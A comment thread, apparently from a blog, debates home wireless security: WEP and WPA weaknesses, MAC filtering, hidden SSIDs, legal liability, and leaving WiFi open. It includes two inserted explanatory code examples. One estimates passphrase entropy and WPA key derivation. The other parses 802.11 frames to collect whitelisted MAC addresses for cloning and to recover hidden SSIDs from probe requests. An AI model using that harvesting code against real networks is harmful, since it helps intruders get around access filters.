The real reason behind securing my WLAN is the German law. Unlike an ISP, who is not responsible for what their users are doing online, courts have decided that if you run an open WLAN in Germany and other people *abuse* it (spamming, copyright violation, and so on) you *ARE* responsible for it. It was done via your account and you could have prevented it (by using an encrypted WLAN), you did not, hence you are responsible for it.
All this talk about whitelisting MAC addresses makes me want to ask: since a MAC address can be configured on pretty much any wireless NIC is this 'security' technique truly effective? Or is it something that just adds a minor level of annoyance to someone who wants to hack into a network (similar to protecting with WEP)?
If all cars have no locks, then your car with a lock is much less likely to be stolen
If all cars have locks, then your car with an alarm is much less likely to be stolen
If all cars have alarms, then your car with an immobiliser is much less likely to be stolen
If your WiFi is unprotected then it will get hijacked
If your WiFi has WEP then it is less likely to get hijacked
If your WiFi has WEP with a decent password then it is even less likely to get hijacked
The point to take home is that just because you use WEP/WPA/whatever, you're not secure. Don't be fooled, with enough resources all wireless is hackable because people can monitor the encrypted traffic.
You are however a little more secure. There's still a heck of a lot of unencrypted traffic, and someone can sit outside, record your actions, make a note that you're about to go on vacation for 1 week, leaving flight xyz at 1300, etc.
Someone mentioned their terms of service saying they are responsible. That is different than legally responsible for illegal content. That said, unless you have money to burn, you're better off not going up against the MPAA legal team justifying their salaries. Regarding the terms of service, you may still have your account terminated or face a bandwidth bill, and that's your fault because that's what you agreed to. You do read the fine print, right?
Encryption as a means to ensure you're not spoofed is a good idea.
When traveling it is nice to hit free wifi and grab my mail, but again I worry about who I've connected to. Is it just a honeypot and they're watching what I'm doing?
At a place I used to work at, all they had was rubbish WEP, because it's the lowest common denominator. Literally thousands upon thousands of laptops meant that they couldn't even conceivably change the password without major effort. The solution was that they regarded the WEP as compromised and had a really good VPN which they did control rather tightly, and all traffic was routed via the VPN. Nothing's perfect, but it works. (vss over vpn over encrypted wireless - ouch!)
The only problem I see is that it's a high barrier to entry to do things correctly. I have a job and a life, and I just don't have the time to set everything up 'just so' to make sure I'm safe. Small companies don't have a chance either. They can only usually afford some small time hobbyist and hope they know what they're doing.
- securing files on my drive
- securing backups
- unsecured backups (because I don't always trust encryption)
- securing network access
- securing the network
- securing the house
- securing programs accessing the network
This is the point of security. It's too hard, so you do a few things and hope for the best.
the incontrovertible mathematical guarantees miss the point
No, they are actually just wrong. There is no watertight mathematical guarantee that any encryption is secure. It is breakable by default, or else you can't decrypt it...
This has always been the case and always will be; it's trivially provable.
Now as to the amount of time it takes to crack... that can be analysed and used as an /indicator/ as to how quickly a given encryption can be cracked.
Ultimately anyone who says security method x is unbreakable for the next y years is wrong by default, and forgot a whole load of common sense before using their fancy theories... or they understood this and missed the importance of careful wording.
I leave my home network open. The chances of my neighbors being highly skilled hackers is next to zero, and even if one moves in or visits without my knowing it, there isn't much exciting or incredibly sensitive on my machine in any case. The worst that can happen is they maliciously screw up my computer, but I have regular daily backups, and believe enough in human nature that if I label my network FreeWifi, only a total prat will feel the need to cause damage.
So the main threat is my neighbor using too much bandwidth with torrents, etc. That hasn't happened in the 6 or so years I've left my connection open, and if it one day does, then I'll just lock it, or set a limit the bandwidth for outsiders (the fon network works like this). No big deal.
I also travel a lot, and it's an incredible pain in the ass to have to pay (and register through some incredibly slow, clumsy process with an incomprehensible UI) for a new wifi hotspot at every damn place I stop. I am overwhelmed by gratitude anytime I find an open network so I can quickly check on some things on the web before moving on. What goes around, comes around, and some generosity on everyone's part would make everyone have to pay less and be less frustrated with web access when not at home.
I'm not at all an expert in security and cryptography, but what about WPA2? Is it much more secure by itself than WPA?
My WiFi network at home is WPA2-encrypted. I'm using Windows Vista and Ubuntu computers. I've noticed that Windows XP computers can't connect to it, because WinXP does not support WPA2.
Advanced people miss the point on this. I know enabling one of these protocols isn't stopping another advanced hacker. It's stopping *my* neighbors from accidentally or even intentionally using my wireless network. Most of my neighbors have computer literacy rates slightly above your average 60 year old. Do you lock your front door to keep out lock-pickers and safe-crackers?
My No Wires setup at work and at home...
1. Wireless open access, SSID broadcast enabled, no encryption.
2. IPSec VPN client required to actually enter the network.
This is why I use WPA-2 and I also use MAC filtering. I have an unusually long passphrase that includes numbers and symbols within words, I also do not broadcast my SSID. I like to think that my set up is secure. I have tried to hack my own network using a laptop that was not on the MAC address list. I was not able to connect. In fact, most wireless software did not even see my network in the first place. I live in a city and there are always at least 5 other networks available. I believe the difficulty one would have in gaining access to my network would be enough to keep them from trying. I think they would be more likely to suck the bandwidth from one of the other people who have no security or WEP on theirs.
@mikeb: MAC is likely a major annoyance because you have to guess it to crack it. It is effectively the first line of defense. If that line of defense fails, then you have the strong password which is not very crackable.
Check out the book called Wi-Foo which is a very interesting read on Wardriving and network security. And a very in-depth read too.
The shift in focus from coding issues to management issues simply shows that you are grasping the bigger picture. I suspect that you would have been middle management in a few years.
Just a comment. :)
Security is a hard one - speaking frankly, a truly secure organization will intimidate most employees who are used to many privileges which are easily exploitable. Adding on to that, bioengineering techniques are both appallingly easy to utilize. Security is largely a bit of an illusion... but still a necessary illusion.
Though a determined industrial hacker will probably get in, they're pretty rare and most companies wouldn't have the budget to stop them anyway - they're essentially a risk of doing business like fire or professional indemnity. The majority of security is for deterring both amateur and employee thefts... and I'd even say it's right up there with the broken window mentality: if people see a booth with a security guard in it, they immediately know that the building is cared for and protected. If there is an IT policy paper, they understand that the IT care for their IT systems - even if that IT policy is a bit hard to work with. The absence of physical and digital security or checks and balances like auditing gives people who encounter it a sense that no one cares.
A very interesting thread/discussion for a change. I found decoy networks and honey pots to be very effective in fighting intruders.
How do you build a honey pot? You can google it.
I'm sorry, but I'm going to have to disagree. Even if WEP/WPA can be cracked easily, it's still better than nothing. If someone is sitting outside my house with a laptop and sees four or five wireless networks available, chances are he will connect to the one with no security. If I've got WEP turned on, even with a weak password, chances are he will connect to my neighbor's network because it's not locked down.
Tell me, wouldn't you see more spam in the comments if you took the orange captcha off?
But I think I get it. Security is a tough problem. If you take the option of mindlessly flipping a WPA or WEP switch off the table, you're now forced to think more critically about the security of
(sigh) No, you don't get it.
Bruce said his reason right at the top:
To me, it's basic politeness. Providing internet access to guests is kind of like providing heat and electricity, or a hot cup of tea. But to some observers, it's both wrong and dangerous.
He then goes on to explain why he thinks it's neither, but that explanation is not really the point. The above statement is.
Sure, your ISP wants you to lock down your wireless network. For that reason, they do everything they can to get you all worked up about wireless security. Their worst nightmare is for every neighborhood to have only 2 or 3 generous people providing access for everyone else. It's a matter of money to them.
But what does it profit *you* to do that work for them? Except in some rather unlikely scenarios, not a thing.
I notice a lot of other posters here don't seem to have read what Bruce wrote about this. You all really should before posting.
For the benefit of the lazy, here are some excerpts refuting a lot of what I see being said here:
I'm told that uninvited strangers may sit in their cars in front of my house, and use my network to send spam, eavesdrop on my passwords, and upload and download everything from pirated movies to child pornography. As a result, I risk all sorts of bad things happening to me, from seeing my IP address blacklisted to having the police crash through my door.
While this is technically true, I don't think it's much of a risk. I can count five open wireless networks in coffee shops within a mile of my house, and any potential spammer is far more likely to sit in a warm room with a cup of coffee and a scone than in a cold car outside my house. And yes, if someone did commit a crime using my network the police might visit, but what better defense is there than the fact that I have an open wireless network? If I enabled wireless security on my network and someone hacked it, I would have a far harder time proving my innocence.
Um, I think you have it wrong Jeff. Bruce's reasoning is just that it's more polite to have an unsecured network. Your posting makes it seem as though he has a "why bother" type attitude. After reading his post, it sounds like he's just being a nice guy by not securing it.
I think you got it wrong Jeff. In Bruce's post, he says he's just leaving it unsecured as a courtesy to others. Your post implies that he isn't securing it because WEP or WPA isn't secure. Sounds like he's just a nice guy and that's why he doesn't add security.
Bruce's decision -- by his own description -- is not one of *promoting* leaving your AP unsecured. He states that he does so, and his reasons for doing so.
First, because he sees benefit in a society where open access points are ubiquitous; e.g. if his neighbors need access because they have problems with their ISP, they can borrow his (and vice-versa).
Second, because he sees very little to gain by doing so. If you participate on open networks often, you have to secure your hosts for open WiFi environments anyhow.
My personal, additional take on it is this: anyone who thinks of security as preventing use simply doesn't get it. Security is about availability, too. Why would you add the admin overhead of rotating your WPA passphrase, keeping your MAC filter list up to date, etc. if you don't have any real security gain?
Wow! Some of you people are very generous to be willing to share your internet service that you pay for with your neighbors. Unless my neighbors want to split the bill, they can get their own!
Wow! Some of you people are very generous to be willing to share your internet service that you pay for with your neighbors. Unless my neighbors want to split the bill, they can get their own!
Bruce Schneier wrote:
If someone were using my network to the point that it affected my own traffic or if some neighbor kid was dinking around, I might want to do something about it; but as long as we're all polite, why should this concern me? Pay it forward, I say.
So if someone's causing problems, sure I'd do something about it. (A good example of this would be calling me up to ask for support or complain about downages on my own line, which a total mooch would almost certainly do.) But if not, what difference does it make to me? Why be selfish just for the sake of being selfish?
So he keeps his wireless open because it allows him to concentrate more on securing his computer? Seems to me that you could do both and it would be just that much more secure. After all, someone can't break into your PC if they can't get to your PC.
I've never been too worried about someone hacking into my computer... much like Jeff, my concern is also bandwidth. I've got a lot of neighbors around me and if even one of them was a peer-to-peer file sharer, that could kill me. Plus the hassles I'd have to deal with if they got caught doing anything illegal.
When I was setting up my new Vista laptop it turned out to be unhappy with suppressed SSID. Looking for a solution, I was browsing some Microsoft literature and found a link to Steve Riley's Security blog, and an interesting article about SSID suppression and MAC filtering.
Apparently you're safer NOT suppressing your SSID, as otherwise your PC has to send out a list of all SSIDs it wants to connect to, more frequently than the WAP broadcasts its own ID.
And MAC is readable from any packet, and easy enough to spoof, but at least it doesn't do any harm to keep filtering on.
So you're relying on encryption, almost entirely.
Having said that, I have long thought how nice it would be to be able to offer others the use of my redundant bandwidth. It's a sad world we live in, where considerations of corporate profits, terrorism and perversion have to take precedence.
33 characters is an arbitrary (and excessively high) standard for a strong pass phrase. Based on the technique described at
each character has 6.55 bits of entropy. So a 20 character passphrase would have over 128 bits of entropy, which is entirely adequate for protecting any wireless network.
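The arithmetic in the comment above (about 6.55 bits per character, so 20 random printable characters clears 128 bits), and the earlier remarks about 63-character generated WPA passphrases versus short passwords, can be checked directly. The following is an added example, not code from the thread or from any generator mentioned in it. It assumes an alphabet of the 94 printable ASCII characters excluding space (log2(94) is about 6.55), and it derives the WPA/WPA2 PMK the way 802.11i specifies (PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations, 256-bit output), since that PMK is what an offline attacker with a captured handshake grinds candidate passphrases against; the SSID `HomeNet` is made up.

```python
"""Passphrase entropy and WPA-PSK derivation (added example, not from the thread).

Assumptions: alphabet = 94 printable ASCII characters without space; PMK per
802.11i = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
"""
import hashlib
import math
import secrets

# Printable ASCII 0x21..0x7E (94 characters). Space is excluded because some
# router UIs trim it; log2(94) is roughly 6.55 bits per uniformly chosen char.
PRINTABLE_NO_SPACE = "".join(chr(c) for c in range(0x21, 0x7F))

# 802.11i limits a WPA/WPA2 passphrase to 8..63 printable ASCII characters.
WPA_MIN_LEN, WPA_MAX_LEN = 8, 63


def bits_per_char(alphabet: str) -> float:
    """Entropy of one character drawn uniformly from `alphabet`."""
    return math.log2(len(alphabet))


def passphrase_entropy(length: int, alphabet: str) -> float:
    """Entropy, in bits, of a `length`-character uniformly random passphrase."""
    return length * bits_per_char(alphabet)


def chars_needed(target_bits: float, alphabet: str) -> int:
    """Shortest uniformly random passphrase over `alphabet` reaching `target_bits`."""
    return math.ceil(target_bits / bits_per_char(alphabet))


def is_valid_wpa_passphrase(passphrase: str) -> bool:
    """Length 8..63 and every character printable ASCII (0x20..0x7E)."""
    return (WPA_MIN_LEN <= len(passphrase) <= WPA_MAX_LEN
            and all(0x20 <= ord(c) <= 0x7E for c in passphrase))


def generate_wpa_passphrase(length: int = 20, alphabet: str = PRINTABLE_NO_SPACE) -> str:
    """Uniformly random passphrase from the OS CSPRNG (secrets, never random)."""
    if not WPA_MIN_LEN <= length <= WPA_MAX_LEN:
        raise ValueError("WPA passphrases must be 8..63 characters long")
    return "".join(secrets.choice(alphabet) for _ in range(length))


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key as 802.11i derives it from passphrase and SSID.

    An attacker holding a captured 4-way handshake recomputes this for each
    guess, so the cost of an offline attack is 2^entropy * 4096 HMAC-SHA1
    evaluations: the passphrase's entropy is the only thing that matters.
    """
    if not is_valid_wpa_passphrase(passphrase):
        raise ValueError("not a valid WPA passphrase")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)


if __name__ == "__main__":
    for name, alphabet in (("printable", PRINTABLE_NO_SPACE),
                           ("lowercase", "abcdefghijklmnopqrstuvwxyz"),
                           ("digits", "0123456789")):
        print(f"{name:10s} {bits_per_char(alphabet):.2f} bits/char, "
              f"{chars_needed(128, alphabet)} chars for 128 bits")
    p = generate_wpa_passphrase(20)
    print(p, f"{passphrase_entropy(20, PRINTABLE_NO_SPACE):.1f} bits",
          derive_pmk(p, "HomeNet").hex())  # "HomeNet" is an assumed SSID
```

Note that the 4096-iteration PBKDF2 only multiplies an attacker's work by a constant; a 20-character random passphrase is out of reach regardless, while a dictionary phrase falls to a wordlist no matter how long it is.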
Actually I think the illusion of security is fine - as long as the illusion is going the right direction. If potential thieves think you have good security, it's a deterrent. That's why you can buy fake security cameras and blinking lights to make it look like you have a car alarm. When my ISP was down, I looked to see if there were any open wireless networks in my area, and I found one - but I also found at least 20 protected by WEP. I wouldn't bother to take the time to break into one - it's much easier to just drive over to McDonald's with my laptop.
Almost every home in America can be broken into with a hard kick or a crowbar, but people lock their doors anyway. This is usually enough to keep from being robbed, but it's not real security. Almost every business in America has a GLASS door on the front, and a burglar alarm that goes off way too late... this isn't security, but it does prevent most businesses from getting robbed.
I use wep at home simply to avoid interference with my neighbors and not because I'm worried about either downloading or hacking. Somehow we all seem to choose the same channel and depending on the weather see each other's networks. This way I don't print on their machines and they don't on mine. The primary security on any of the machines in my home network is local to each machine, and unfortunately depends on the security consciousness of my teenage children ;-) . If you've read Mitnick's how to book on fraud then you see that people are the security hole and to a large extent the coding algorithms only have to be good enough to make human factors attacks the only possible success.
I think everyone is missing the point when he says he leaves his wifi network open. He's saying that you should protect your data at more granular levels than just tossing a key or passphrase on your wifi. networks are more easily physically attacked - someone just walking in and plugging in a cat6 cable. Once they're on your network, what do you have in place to prevent theft or destruction of your data?
Think about that aspect - assume someone can and will get on your network - through a brute force attack, social engineering, or breaking and entering - what defense do you have now? Stating he keeps his network open is a way to get people to think about security a little more deeply, past algorithms and passphrases and such. Assuming a sufficiently motivated attacker will surpass such protection, where does that leave you, your data, and your business?
It's not an intrusion but a humble request to the community here.
I have recently started an articles website and would request you (I will appreciate if you can) to please spare some time and post articles at my site.
I just use a WPA passphrase constructed from one of Jeff's regexes:
Unfortunately, now I have two problems...
If you don't want anyone trying to access your network, don't use wireless. If you don't mind sharing, use wireless. Simple as that, if you ask me.
I don't do anything sensitive over the air, so sniffing encryption isn't important to me. What's important is that no one gets full access to my network.
@Bear - I don't think anyone is missing that point really, and I think what Jeff is saying is that even if you have your data encrypted and whatnot, you should still protect the network itself because that is a resource that you paid for. I put my gun and some valuables in a safe, right next to my mean little dog, but I still lock the house.
I believe the 2WIRE### wireless access points are from the utilities company for reporting gas/electrical usage. That's how it works in our city.
MAC filtering will keep out most of the neighbours, but MAC addresses can be detected and spoofed using readily available tools (allegedly).
Just a sniff of a single packet from one of your whitelisted devices will reveal its MAC address in plain text, no guessing necessary.
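Both the point just made (a whitelisted MAC is readable from any single frame) and the earlier comment about SSID suppression (a client looking for a hidden network names it in its probe requests) come down to the same fact: WEP/WPA/WPA2 encrypt only the data payload, never the 802.11 MAC header or management frames. The following is an added example, not code from the thread: a minimal 802.11 header parser run over two frames constructed by hand for the example (one WPA2-protected data frame, one probe request for a hidden SSID); the BSSID `00:1d:7e:aa:bb:cc`, the station `00:11:22:33:44:55`, the whitelist and the SSID `HiddenHomeNet` are all made up, and the bytes standing in for ciphertext are arbitrary.

```python
"""What stays cleartext on an encrypted WLAN: a small 802.11 header parser.

Added example with hand-constructed frames (not captures). Frame Control byte 0
carries type (bits 2-3) and subtype (bits 4-7); byte 1 carries ToDS (bit 0),
FromDS (bit 1) and Protected (bit 6). Addresses sit at fixed offsets after it.
"""
from dataclasses import dataclass
from typing import Iterable, Optional, Set

BROADCAST = "ff:ff:ff:ff:ff:ff"
TYPE_MGMT, TYPE_DATA = 0, 2
SUBTYPE_PROBE_REQ, SUBTYPE_BEACON = 4, 8
FLAG_TO_DS, FLAG_FROM_DS, FLAG_PROTECTED = 0x01, 0x02, 0x40
IE_SSID = 0  # information element tag for the SSID


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))


@dataclass
class Frame:
    ftype: int
    subtype: int
    to_ds: bool
    from_ds: bool
    protected: bool   # payload encrypted (WEP/TKIP/CCMP); header still clear
    addr1: str        # receiver
    addr2: str        # transmitter: the address a MAC filter keys on
    addr3: str
    ssid: Optional[str] = None


def _parse_ssid(ies: bytes) -> Optional[str]:
    """Walk tag/length/value information elements and return the SSID one."""
    i = 0
    while i + 2 <= len(ies):
        tag, length = ies[i], ies[i + 1]
        value = ies[i + 2:i + 2 + length]
        if len(value) < length:
            break  # truncated element, stop rather than misparse
        if tag == IE_SSID:
            return value.decode("utf-8", errors="replace")
        i += 2 + length
    return None


def parse_frame(raw: bytes) -> Frame:
    """Decode the 24-byte MAC header; nothing in it is ever encrypted."""
    if len(raw) < 24:
        raise ValueError("frame shorter than the 802.11 MAC header")
    fc0, fc1 = raw[0], raw[1]
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    body, ssid = raw[24:], None
    if ftype == TYPE_MGMT and subtype == SUBTYPE_PROBE_REQ:
        ssid = _parse_ssid(body)
    elif ftype == TYPE_MGMT and subtype == SUBTYPE_BEACON:
        ssid = _parse_ssid(body[12:])  # skip timestamp, interval, capabilities
    return Frame(ftype, subtype, bool(fc1 & FLAG_TO_DS), bool(fc1 & FLAG_FROM_DS),
                 bool(fc1 & FLAG_PROTECTED), mac_str(raw[4:10]),
                 mac_str(raw[10:16]), mac_str(raw[16:22]), ssid)


def harvest_whitelisted_macs(frames: Iterable[bytes], whitelist: Set[str]) -> Set[str]:
    """Whitelisted stations seen transmitting: the addresses an attacker clones."""
    return {f.addr2 for f in map(parse_frame, frames) if f.addr2 in whitelist}


def probed_ssids(frames: Iterable[bytes]) -> Set[str]:
    """Hidden network names that clients leak in their probe requests."""
    return {f.ssid for f in map(parse_frame, frames)
            if f.ftype == TYPE_MGMT and f.subtype == SUBTYPE_PROBE_REQ and f.ssid}


def build_frame(fc: bytes, a1: str, a2: str, a3: str, body: bytes) -> bytes:
    """Frame Control + Duration + three addresses + Sequence Control + body."""
    return fc + b"\x00\x00" + mac_bytes(a1) + mac_bytes(a2) + mac_bytes(a3) + b"\x10\x00" + body


# Constructed sample capture (assumed addresses, not real traffic).
AP = "00:1d:7e:aa:bb:cc"
LAPTOP = "00:11:22:33:44:55"
WHITELIST = {LAPTOP, "00:11:22:33:44:66"}

# WPA2 data frame, station -> AP: type=data (0x08), ToDS|Protected (0x41).
# Body: 8-byte CCMP header followed by arbitrary bytes standing in for ciphertext.
ENCRYPTED_DATA = build_frame(b"\x08\x41", AP, LAPTOP, "00:1d:7e:00:00:01",
                             bytes.fromhex("0120006000000000") + bytes(range(0x9b, 0xbb)))

# Probe request from the laptop for a hidden network: type=mgmt, subtype=4 (0x40).
# Body: SSID element (tag 0, 13 bytes) then a supported-rates element (tag 1).
PROBE = build_frame(b"\x40\x00", BROADCAST, LAPTOP, BROADCAST,
                    b"\x00\x0dHiddenHomeNet" + b"\x01\x04\x02\x04\x0b\x16")

CAPTURE = [ENCRYPTED_DATA, PROBE]

if __name__ == "__main__":
    print("cloneable MACs:", harvest_whitelisted_macs(CAPTURE, WHITELIST))
    print("hidden SSIDs probed:", probed_ssids(CAPTURE))
```

The parser never touches the encrypted payload: the Protected bit, the transmitter address and the probed SSID are all read straight off the header and management body, which is why MAC filtering and SSID hiding are at most a nuisance and the passphrase is the only control that costs an attacker real work.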
If I have nothing to steal will the thief still come in the night?